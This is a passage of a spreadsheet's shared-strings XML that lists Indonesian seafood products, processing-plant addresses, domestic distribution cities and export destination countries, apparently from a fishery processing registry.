    <t>Albania, Croatia, Germany, Montenegro</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Salem)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Duta Bandara Permai Blok ZU 5 No.1-3, Kel. Jati Mulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kompleks Dermaga TNI-AU Pattimura, Kel. Laha, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Surabaya, Kota Ambon</t>
  </si>
  <si>
    <t>Jl. Kalimati No.36, Dusun Stoplas, Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Layang)</t>
  </si>
  <si>
    <t>Kabupaten Pati</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, United States</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Amberjack, Lemuru, Mata Besar, Deho, Escolar, Lemadang, Marlin, Semar, Sarden, Cakalang, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Australia, Canada, Japan, Korea, Democratic People's Republic of, Netherlands, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Jl. Raya Tanjung Bintang No.101, Kel. Serdang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Dukuh Matalan, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Jakarta Pusat, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kuwe, Kembung, Selar, Layang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>China, Malaysia, Sri Lanka, Thailand</t>
  </si>
  <si>
    <t>PT. MINA JAYA LESTARI PLANT 2</t>
  </si>
  <si>
    <t>Pergudangan Margomulyo Permai Blok K-14, K-15, K-16, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Australia, Canada, China, Japan, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Kembung, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kawasan Industri Gresik Kav G-1, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Canada, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam</t>
  </si>
  <si>
    <t>Udang Berlapis Tepung Beku</t>
  </si>
  <si>
    <t>Jl. Raya Km 9, Kel. Biak, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu Bintik, Lencam, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, France, Thailand, United States</t>
  </si>
  <si>
    <t>China, Greece, Hong Kong, Japan, Malta, Mexico, Panama, Slovenia, Spain, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Poros Pinrang - Pare-Pare Km 6, Kel. Manarang, Kec. Mattiro Bulu, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kabupaten Bone, Kota Makassar, Kota Palopo, Kota Kendari</t>
  </si>
  <si>
    <t>Malaysia, Saudi Arabia</t>
  </si>
  <si>
    <t>Abon Duri Bandeng</t>
  </si>
  <si>
    <t>Kota Makassar, Kota Palopo, Kota Kendari</t>
  </si>
  <si>
    <t>Saudi Arabia</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Bandeng) </t>
  </si>
  <si>
    <t>Kabupaten Bone, Kota Makassar, Kota Palopo</t>
  </si>
  <si>
    <t>Amplang Bandeng</t>
  </si>
  <si>
    <t>Tik-tik Bandeng</t>
  </si>
  <si>
    <t>Desa Sukawali RT 01 RW 04, Kec. Pakuhaji, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kabupaten Serang</t>
  </si>
  <si>
    <t>Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No.19, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Pergudangan 88, Jl. Pesing Poglar No.76A RT 004 RW 002, Kel. Kedaung Kaliangke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal Hitam, Sebelah)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Selar, Layang, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Jl. Pusat Pemasaran Ikan No.74,75,76 Pelabuhan Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Pisang-pisang, Anggoli, Kerapu, Layur, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kuwe, Kembung, Lemadang, Salem, Talang-talang, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Nizam Zachman Jl. Muara Baru Ujung Blok T No.8 RT 020 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kuwe, Kembung, Lemadang, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Dusun Ketawang RT 01 RW 01, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Trenggalek</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Layur, Bawal, Kakap, Cunang)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Taman Pergudangan dan Perkantoran Blok C8, Jl. Muara Baru Raya No. 30 Kp. Luar Batang, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Alaska Pollock)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kerapu, Kakap Merah, Kuro)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Jl. KIG Raya Barat Kav G-2, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Germany, Italy, Spain</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Lemadang, Marlin, Gindara, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>France, Germany, Spain</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Nila)</t>
  </si>
  <si>
    <t>Germany, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Greece, Spain</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Germany</t>
  </si>
  <si>
    <t>Telur Salmon Beku</t>
  </si>
  <si>
    <t>Jl. Hatni No.200 Km 60,8, Kel. Tlogosadang, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Sebelah, Senangin, Biji Nangka, Kuniran, Kerapu, Gerot-gerot, Layur, Beloso, Kapas-kapas, Kakap, Kuro, Lidah, Jaket, Bawal)</t>
  </si>
  <si>
    <t>China, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Marlin, Talang-talang, Layang, Cakalang, Tenggiri, Pedang, Selar, Lemuru, Cobia)</t>
  </si>
  <si>
    <t>Ikan Asin Beku</t>
  </si>
  <si>
    <t>Jl. Raya Gintik RT 005 RW 002, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ghana</t>
  </si>
  <si>
    <t>Jl. PPI, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Sirip Hiu Beku</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Probolinggo, Kota Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Probolinggo, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Kima 15 Kav R4D - R4E, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of</t>
  </si>
  <si>
    <t>Jl. Kapuk Kamal Muara VII No.73 (Room 5), Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap, Kerapu, Bawal, Layur, Kakatua, Sebelah, Lencam)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Marlin, Layang, Cakalang, Todak, Tenggiri)</t>
  </si>
  <si>
    <t>Rumput Laut Kombu Kering</t>
  </si>
  <si>
    <t>Wakame Kering</t>
  </si>
  <si>
    <t>Jl. Raya Gumuk Rejo RT 02 RW 02, Kel. Gumukrejo, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Makerel, Layang, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Kabupaten Pringsewu, Kota Bandar Lampung, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Kabupaten Lampung Selatan, Kabupaten Lampung Utara, Kabupaten Pringsewu, Kota Bandar Lampung, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Tangerang</t>
  </si>
  <si>
    <t>Kabupaten Lampung Selatan, Kabupaten Lampung Utara, Kota Bandar Lampung, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Australia, China, Malaysia, Singapore, Thailand, United States</t>
  </si>
  <si>
    <t>Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Cephalopoda Rebus Beku</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri X/1, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Lencam, Kuniran, Kerapu, Layur, Sukang, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. K. L. Yos Sudarso KM 8,8 No.88, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Steak Ikan Beku</t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan)</t>
  </si>
  <si>
    <t>Kabupaten Deli Serdang, Kabupaten Serdang Bedagai, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Binjai</t>
  </si>
  <si>
    <t>Jl. Kapasa Raya No.38A, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>United States, United States Minor Outlying Islands</t>
  </si>
  <si>
    <t>Sri Lanka</t>
  </si>
  <si>
    <t>Ecuador</t>
  </si>
  <si>
    <t>Desa Carat, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Medan, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Banjarmasin, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Belgium</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Nugget Ikan, Katsu, Stick Ikan, Tempura, Ikan Pop, Fillet, Steak, Kani Katsu, Scallop Katsu)  </t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t xml:space="preserve">Cephalopoda Bernilai Tambah Beku (Calamari Katsu, Cumi-cumi Crispy, Idako, Kurage, Sate Calamari, Sate Tentakel, Sate Idako) </t>
  </si>
  <si>
    <t>Kota Medan, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Udang Bernilai Tambah Beku (Ebi Furai, Ebi Tempura, Ebi Katsu, Nugget Udang, Siomay Udang, Sate Udang, Shrimp Butterfly Katsu, Spring Roll, Udang Pop)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Manyung, Kerapu, Layur, Sukang, Bawal, Kakap, Kaci-kaci, Kurisi)</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Tongkol, Tembang, Kembung, Lemadang, Marlin, Layaran, Cakalang, Tenggiri, Pedang, Selar Kuning)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bandung, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Burhanuddin LK II, Kel. Perjuangan, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Sarden, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Malong, Gulama, Kambing-kambing, Biji Nangka, Bawal, Samge, Kakap, Ayam-ayam)</t>
  </si>
  <si>
    <t>Pundung Pedukuhan V RT 017 RW 009, Kel. Banaran, Kec. Galur, Kabupaten Kulon Progo&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Kota Yogyakarta</t>
  </si>
  <si>
    <t>Fillet Tuna Segar</t>
  </si>
  <si>
    <t>Jl. Blanak No.1 Blok B1 No.19 Kawasan Pelabuhan Perikanan Pantai Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu)</t>
  </si>
  <si>
    <t>Steak Tuna Segar</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok S Kav No.12B RT 006 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Pari Beku</t>
  </si>
  <si>
    <t>Kawasan Industri Karyadeka Pancamurni Kav. B3, Cikarang, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Australia, France, Italy, Japan, Spain</t>
  </si>
  <si>
    <t>Canada, Japan, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Pedang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemadang, Pedang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Lemadang, Marlin, Layaran, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Sebelah, Kerapu, Layur, Bawal, Kakap, Lidah, Kurisi)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Sebelah, Kerapu, Layur, Bawal, Kakap, Lidah, Kurisi)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kembung, Lemadang, Marlin, Layaran, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya</t>
  </si>
  <si>
    <t>Hong Kong, Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Gurita Beku</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya</t>
  </si>
  <si>
    <t>Kampung Adiwarna, Kec. Gedung Meneng, Kabupaten Tulang Bawang&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Raya Sunan Gunung Jati No.15-16 RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Canada, China, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t xml:space="preserve">Seafood Bernilai Tambah Beku (Udang Berlapis Tepung, Wonton Udang, Udang Goreng, Popcorn Udang, Nugget Udang, Siomay Udang, Udang Roll, Kue Udang, Bakwan Udang, Tempura Udang)   </t>
  </si>
  <si>
    <t>Japan, Philippines, United Kingdom</t>
  </si>
  <si>
    <t>Jl. Syiah Kuala, Kel. Lamdingin, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemadang, Marlin, Meka, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Senangin, Kerapu, Layur, Jenaha, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Pembangunan No.5, Komplek PPI Sodohoa, Kel. Sanua, Kec. Kendari Barat, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Layur, Kakatua, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>China, Japan, United Kingdom, United States</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, United Kingdom, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Marlin, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, United Arab Emirates</t>
  </si>
  <si>
    <t>Jl. Brigjen Katamso No.24 RT 004 RW 004, Kel. Kampung Dalem, Kec. Kota, Kota Kediri&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kabupaten Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Lemuru, Tongkol, Kembung, Lemadang, Marlin, Salem, Muroaji, Layang, Cakalang, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Sembilang, Emperor, Kerapu, Layur, Beloso, Bawal, Kakap, Baronang, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kabupaten Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Utara, Kabupaten Bandung, Kota Bogor, Kota Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Wonsobo I RT 03 RW 01, Kel. Banjarejo, Kec. Tanjungsari, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Tahu Bakso Ikan)</t>
  </si>
  <si>
    <t>Kabupaten Gunung Kidul, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Krispy Ikan, Krispy Kulit Ikan, Krispy Rumput</t>
  </si>
  <si>
    <t>Kerupuk Ikan, Kerupuk Udang, Kerupuk Rumput Laut</t>
  </si>
  <si>
    <t>Jl. Tongkol Komplek Kantor Pelabuhan Perikanan Donggala, Kel. Labuan Bajo, Kec. Banawa, Kabupaten Donggala&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>Jl. Raya Sawocangkring No.02 RT 01 RW 01, Kel. Sawocangkring, Kec. Wonoayu, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Kuniran, Layur, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Cumi-cumi, Nugget Ikan)</t>
  </si>
  <si>
    <t>Jl. Pangkalan Brandan No.143, Kel. Beras Basah, Kec. Pangkalan Susu, Kabupaten Langkat&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Hong Kong, Singapore</t>
  </si>
  <si>
